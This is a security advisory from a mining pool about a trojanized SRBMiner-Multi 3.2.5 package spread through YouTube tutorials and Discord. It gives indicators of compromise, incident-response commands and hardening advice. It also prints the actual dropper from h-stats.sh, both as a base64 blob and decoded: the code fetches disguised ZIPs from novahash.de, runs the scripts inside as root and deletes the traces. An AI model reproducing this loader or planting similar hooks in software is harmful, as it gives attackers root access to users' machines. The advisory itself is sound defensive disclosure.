⚠️ Security Advisory · High Priority

Trojanized SRBMiner 3.2.5 Package in the Wild
What miners need to know, in the order they’ll want to know it

A fake SRBMiner-Multi tarball is being distributed from miningrepositories.blog. The payload drops a root-level stage-2 from novahash.de via the Hive OS stats script every ten seconds or so, which is really quite rude.

Published 17 April 2026 · Suprnova.cc · Running mining pools since 2013

⚠️ If you installed this package

Do not try to clean this by hand. Reformat the rig.

The h-stats.sh script in this tarball runs as root on every Hive OS stats poll — roughly every ten seconds, for as long as the rig is powered on. It fetches and executes a second-stage payload, then deletes the visible artefacts. If you delete files by hand, it simply drops them again on the next poll. Cheerful little thing, isn’t it.

At that privilege level you cannot trust the box. You must reimage the rig from a clean OS, reinstall from scratch, and rotate every credential that ever touched it — pool accounts and API keys, SSH keys, wallet seed phrases stored on disk, saved browser sessions, the lot. Also audit any other machines that share credentials with the affected rig, because lateral movement is the sort of thing this class of attacker very much enjoys.

We appreciate that “reformat the rig” is not what anyone wants to hear on a Thursday. It is, however, the only correct answer.

Self-identification: if you set up a rig by following a YouTube tutorial from the user “Argenminers” for mining C64Chain or Qubit (QTC) on or after 16 April 2026, or if someone dropped the link for you in either coin’s Discord — that is the delivery path for this tarball. Treat the rig as compromised and follow the steps above.

TL;DR

Someone is shipping a doctored SRBMiner-Multi 3.2.5 package from miningrepositories.blog. The miner binary appears legitimate and acts as cover; the malicious bit is hidden inside h-stats.sh as a base64-encoded block that, on every Hive OS stats poll, downloads two “image” files (really ZIPs) from novahash.de, extracts them to /etc/, runs the shell scripts inside as root, and tidies up after itself. If you installed this tarball on any rig: reformat. Block novahash.de and miningrepositories.blog at your firewall. Only ever download SRBMiner from github.com/doktor83/SRBMiner-Multi/releases and verify the SHA256 against the published value.

IOCs — for the people who just want to grep

Everything a defender needs in one block. Fuller detail is further down, but if you’re here to check your fleet, start here.

Network (block these)
Distribution domain
miningrepositories.blog
Stage-2 C2 domain
novahash.de
Stage-2 URLs
https://novahash.de/fileslab/recuaikaan.png
https://novahash.de/fileslab/mqtato-fla.jpg
Trojanized tarball URL
https://miningrepositories.blog/srbminer-3.2.5.tar.gz
Filesystem artefacts (may be absent — dropper self-cleans)
/etc/recuaikaan.png
/etc/recuaikaan.zip
/etc/recuaikaan.sh
/etc/mqtato-fla.jpg
/etc/mqtato-fla.zip
/etc/mqtato-fla.sh
Hashes (cover miner binary)
SHA256 (srbminer_bin)
9d69228bce9ad3f1cde0f7fa0141e7588922227ee67b3c3f12788a0429909d06
BuildID (srbminer_bin)
fc2487ec223c91039748e53c08328af91260cd8c

The filesystem artefacts are cleaned up by the dropper after each run, so their absence does not mean you’re clean — only their presence is conclusive. Judge by logs, by the contents of h-stats.sh on disk, and by outbound traffic to novahash.de.

Distribution vector

The package is currently being offered as an SRBMiner-Multi download from miningrepositories.blog, a domain chosen to sound generic and trustworthy to an operator searching for miner binaries. It is not a known or legitimate distribution channel for SRBMiner or, as best we can tell, anything else.

Red flags at a glance

Delivery: YouTube tutorials and Discord seeding (observed)

The trojanized tarball isn’t sitting on a random domain waiting for someone to stumble onto it. It was actively promoted through channels miners trust:

Observed distribution (2026-04-16)

What this tells us about the attacker’s playbook

This is social engineering, not a drive-by download. Each step of the attacker’s process is deliberately chosen to lower the target’s guard:

  1. Pick small coins with active Discord communities and a steady trickle of newcomers. C64Chain and QTC are exactly the sort of coin where a new miner lands in the Discord, asks how to get started, and gratefully accepts the first link someone helpful hands them. Bigger coins attract more scrutiny; smaller ones attract more trust.
  2. Produce a working tutorial. The YouTube video demonstrates a rig that actually mines, because the miner binary in the tarball is a real working miner (cover). Visual proof is persuasive — a video showing accepted shares rolling in is worth a thousand “trust me”s.
  3. Accumulate reputation first, weaponise second. Once the video exists and a few comments say “this worked, thanks!”, the link becomes self-reinforcing — every new viewer sees social proof before they see a reason to be suspicious.
  4. Seed into new-miner channels. Drop the tarball link into Discord channels where newcomers ask for setup help. The payload runs on first stats poll; the attacker doesn’t need the victim to do anything beyond “follow the tutorial.”
  5. Count on community moderators not auditing tarballs. Almost no coin Discord has the resources to reverse-engineer every “helpful” tarball posted to its mining channel. A friendly-looking user with a YouTube channel looks like a community member, not a threat.
The takeaway

A working YouTube tutorial and a friendly Discord post are not trust signals. The attacker’s video almost certainly demonstrates a rig that mines correctly — because it does. The harm is inside h-stats.sh, running as root, on the rig the viewer just lovingly configured. If you are a new miner: only trust miner downloads from the official project repository for that miner, and verify the SHA256 every single time. If you run a coin Discord: consider a pinned “do not trust tarballs posted here unless they come from the official project” notice at the top of the mining channel.

If you are part of the C64Chain or Qubit (QTC) community and set up a rig from the Argenminers tutorial, or linked a friend to it — please share this advisory with that community, and treat any rig built from that guide as compromised.

What’s in the tarball

The archive is a full Hive OS custom-miner integration, with a Minerstat integration (mmp-*) shoved in alongside for good measure. Authentic distributions ship one or the other — not both — so the bundling itself is a giveaway.

FileSizeStatus
h-manifest.conf616 BClean (cosmetic tampering only)
h-run.sh764 BClean (cosmetic tampering only)
h-config.sh205 BClean
h-stats.sh8,646 BMALICIOUS — contains dropper
mmp-stats.sh4,116 BClean
mmp-external.conf63 BClean (version mismatch noted)
srbminer_bin20,309,184 B (~20 MB)Likely genuine/near-genuine SRBMiner (cover)

Telltale signs of repackaging

None of the following are malicious in themselves — they’re the kind of diagnostic detail that tells you the package isn’t from where it claims:

The payload: h-stats.sh

Most of h-stats.sh is, annoyingly, a perfectly functional Hive OS stats parser. It queries the miner’s HTTP API on 127.0.0.1:$MINER_API_PORT, parses hashrate, shares, temperatures, and fan speeds for GPU and CPU workers, handles single- and dual-algorithm mining, and emits valid stats JSON back to the Hive agent. This is not incidental — it’s essential cover. If the script were broken, Hive would show the rig as offline and the operator would investigate within minutes.

Appended after the legitimate stats logic, and before the final fallback assignments, is this block:

p="bm9odXAgc3VkbyB3Z2V0IC1xIGh0dHBzOi8vbm92YWhhc2guZGUvZmlsZXNsYWIvcmVjdWFpa2Fhbi5wbmcg
LU8gL2V0Yy9yZWN1YWlrYWFuLnppcCAmJiBzdWRvIHVuemlwIC1xIC1vIC9ldGMvcmVjdWFpa2Fhbi56aXAgLWQg
L2V0YyAmJiBzdWRvIGJhc2ggL2V0Yy9yZWN1YWlrYWFuLnNoIDsgc3VkbyB3Z2V0IC1xIGh0dHBzOi8vbm92YWhh
c2guZGUvZmlsZXNsYWIvbXF0YXRvLWZsYS5qcGcgLU8gL2V0Yy9tcXRhdG8tZmxhLnppcCAmJiB1bnppcCAtcSAt
byAvZXRjL21xdGF0by1mbGEuemlwIC1kIC9ldGMgJiYgYmFzaCAvZXRjL21xdGF0by1mbGEuc2ggOyBybSAvZXRj
L21xdGF0by1mbGEuemlwIDsgcm0gL2V0Yy9tcXRhdG8tZmxhLnNoIDsgcm0gL2V0Yy9yZWN1YWlrYWFuLnNoIDsg
cm0gL2V0Yy9yZWN1YWlrYWFuLnppcCA+IC9kZXYvbnVsbCAyPiYxICY="
nohup sh -c "$(echo "$p" | base64 -d)" > /dev/null 2>&1 &

Decoded, the base64 payload is:

nohup sudo wget -q https://novahash.de/fileslab/recuaikaan.png -O /etc/recuaikaan.zip \
  && sudo unzip -q -o /etc/recuaikaan.zip -d /etc \
  && sudo bash /etc/recuaikaan.sh ; \
sudo wget -q https://novahash.de/fileslab/mqtato-fla.jpg -O /etc/mqtato-fla.zip \
  && unzip -q -o /etc/mqtato-fla.zip -d /etc \
  && bash /etc/mqtato-fla.sh ; \
rm /etc/mqtato-fla.zip ; rm /etc/mqtato-fla.sh ; \
rm /etc/recuaikaan.sh ; rm /etc/recuaikaan.zip > /dev/null 2>&1 &

Execution behaviour, step by step

  1. Two “image” files (.png and .jpg) are fetched via wget from novahash.de. The image extensions are camouflage: the actual content is ZIP archives. This is a familiar trick for slipping past naive egress filters that inspect script and archive traffic but wave images through.
  2. Each archive is written to /etc/, renamed to .zip, and extracted in place with unzip -o (overwrite).
  3. Each archive contains a shell script (recuaikaan.sh, mqtato-fla.sh) which is then executed — the first explicitly with sudo, the second relying on the already-root context in which the Hive agent runs.
  4. All four artefacts (both .zips and both .shs) are then deleted from /etc/. This sanitises the dropper’s footprint: a forensic look at /etc/ afterwards finds nothing, while whatever the stage-2 scripts installed elsewhere remains resident.
  5. The whole chain runs in the background via nohup … &, so the legitimate stats output upstream is neither blocked nor delayed. Hive continues to see a healthy rig.

Why h-stats.sh is the perfect injection site

Why this placement is nasty, in plain English

What that gives the attacker:

It’s as if someone slipped a note into your front-door letterbox that reads “please leave the back door unlocked”, and then posted the same note every ten seconds, forever, while also tidying up the previous ones. You cannot out-tidy them. You have to change the locks.

The cover miner: srbminer_bin

The binary included in the package looks like a legitimate or near-legitimate SRBMiner-Multi build. Its job, from the attacker’s point of view, is to be uneventful:

The attacker’s plan depends on the miner producing plausible hashrate and share output so that Hive and Minerstat dashboards look normal and the operator has no reason to investigate. All observed malicious functionality is in h-stats.sh; the binary is not the attack vector.

Verification recommendation

Compare the binary’s SHA256 against known-good hashes from github.com/doktor83/SRBMiner-Multi/releases, or submit it to VirusTotal. A mismatch with any published SRBMiner hash is grounds to treat the binary itself as suspect, regardless of anything written here.

Full Indicators of Compromise

Network

Filesystem (dropper artefacts)

Deleted by the dropper after execution — absence is not exonerating:

/etc/recuaikaan.png
/etc/recuaikaan.zip
/etc/recuaikaan.sh
/etc/mqtato-fla.jpg
/etc/mqtato-fla.zip
/etc/mqtato-fla.sh

File hashes

Process and behavioural signatures

Package-level red flags (useful for finding other trojanised packages)

Incident Response Checklist

If you installed this package on any rig or server, work through these in order. Be slightly grumpy about it. That’s the correct emotional posture.

1

Isolate

Disconnect the affected rig from the network immediately. Do not shut it down first — memory state may be useful, and some persistence mechanisms trigger on boot.

2

Block C2 everywhere

Add novahash.de to DNS sinkhole and firewall deny lists across the whole network, not just the affected rig. Lateral movement is on the table, so assume other machines may have been poked at.

3

Snapshot for forensics (if you care)

If you’ve the patience, image the disk before remediation, and capture memory if you have tools for it. If you don’t — fair enough, skip to remediation.

4

Check dropper artefacts

ls -la /etc/recuaikaan* /etc/mqtato* 2>/dev/null
5

Check userland rootkit indicators

cat /etc/ld.so.preload   # should be empty or not exist
6

Look for recently modified files

find /etc /usr/local/bin /usr/local/sbin /root /tmp /var/tmp /dev/shm \
     -mtime -30 -type f -ls 2>/dev/null
7

Audit persistence mechanisms

crontab -l
for u in $(cut -f1 -d: /etc/passwd); do crontab -u "$u" -l 2>/dev/null; done
ls -la /etc/cron.* /etc/cron.d/ /var/spool/cron/
systemctl list-unit-files --state=enabled
systemctl list-timers --all
8

Hunt SSH backdoors

find / -name "authorized_keys" 2>/dev/null -exec ls -la {} \; -exec cat {} \;
grep -E '^(PermitRootLogin|PasswordAuthentication|AuthorizedKeysFile)' /etc/ssh/sshd_config
9

Check outbound connections

ss -tnp | grep -E '(srbminer|sh|wget|curl)'
10

Verify miner config integrity

Compare the wallet address and pool URL in the actual miner config against what’s configured in Hive or Minerstat. Second-stage payloads of this kind commonly replace mining credentials with attacker-controlled ones, so that the victim dutifully pays the attacker’s electricity bill on the attacker’s behalf. Which is a bit much.

11

Run rootkit scanners

chkrootkit
rkhunter --check --skip-keypress
12

Review sudo logs

grep -E 'wget|bash /etc' /var/log/auth.log /var/log/secure 2>/dev/null
13

If any indicator hits — reimage. Full stop.

Userland code executing as root on a short interval cannot be reliably cleaned by hand. Reinstall the operating system on the rig, rotate every credential that touched the machine (pool accounts, SSH keys, wallet seeds stored anywhere on disk), and audit any other devices that share credentials with the affected rig. Treat this as a chance to tidy up some things you’ve been meaning to tidy up anyway.

Hardening: how not to end up here

A few habits that would have prevented this outright. None of them are novel; all of them are boring; boring is the vibe we’re going for.

1. Only download miners from verified sources

For SRBMiner specifically, that’s github.com/doktor83/SRBMiner-Multi/releases. For any other miner, find the official project page on GitHub — usually linked from the pool’s Getting Started page. Everything else is a guess.

2. Always verify SHA256

Official miner releases publish checksums. sha256sum the download and compare. It takes eight seconds, which is substantially less than the time it takes to reimage a rig.

3. Be sceptical of “custom” or “patched” miner packages

Unless they come from a known, trusted source in the community. Stats-integration wrappers are a favourite injection site precisely because most operators never read them. That is the entire reason we are here.

4. Read the integration scripts before first run

Spend 30 seconds with less h-stats.sh before pointing a flight sheet at a new custom miner. Long encoded strings, network calls to unfamiliar domains, writes to /etc/ or /usr/local/ — these are all red flags and any one of them is worth pausing for.

5. Egress filtering

Rigs don’t need to reach arbitrary domains. Allowlist the pool IPs and block everything else. A properly firewalled rig cannot be dropper-staged even if a malicious script manages to run, because it has nowhere to fetch stage-2 from.

6. Monitor outbound connections

A rig making HTTPS requests to anything outside your pool is suspicious by default. This is not paranoia — this is the lowest-cost detection you have.

7. Remember what runs as root

On Hive OS, the Hive agent runs as root and the user account has passwordless sudo. That means any script the Hive agent invokes effectively has root. Be aware of it. If your framework supports unprivileged mining users, use them.

A note from Suprnova

Pool operators and their miners are a target-rich population for this sort of attack. A trojanized miner on a rig doesn’t just compromise that rig — it can redirect hashrate away from the pool it’s notionally mining on, lift pool credentials out of config files, and serve as a pivot into your broader infrastructure. Our users are, on average, more technical, more valuable, and more specifically targeted than the general population of “people who download things”, and that attention is not, on balance, a compliment.

If you come across a suspicious miner download, an unusual tarball, or a Discord or Telegram DM pushing “custom” or “patched” miner binaries — please forward it to admin@suprnova.cc or drop it in our Discord. We’ll take a look, update this advisory as needed, and warn the rest of the community. Belt, braces, and a bit of shared paranoia — the three pillars of a happy mining rig.

The Bottom Line

The tarball at https://miningrepositories.blog/srbminer-3.2.5.tar.gz is trojanized. The miner binary is cover; the real payload lives in h-stats.sh and reaches out to novahash.de every ten seconds, as root, for as long as the rig is running.

If you installed this package on any machine, you must reformat it. Not “investigate it”. Not “clean it up”. Reformat. Rotate every credential that touched the box. Audit anything that shared credentials with it. There is no middle option that is also correct.

Block novahash.de and miningrepositories.blog. At DNS and at your egress firewall. Everywhere, not just on the affected rig.

Only download miners from verified upstream sources, and verify the SHA256 every time. The official SRBMiner releases live at github.com/doktor83/SRBMiner-Multi/releases. Anywhere else pretending to offer SRBMiner is, at best, untrusted.

Related Articles

Mining Pool Security

How mining pools protect themselves and their miners from DDoS, exploits, and other threats.

Mining Hardware Guide

A practical guide to choosing and maintaining mining hardware — including the boring software side.

A Day in the Life of a Pool Operator

When compromised hosts point at your pool, everyone loses — including a pool operator’s Tuesday.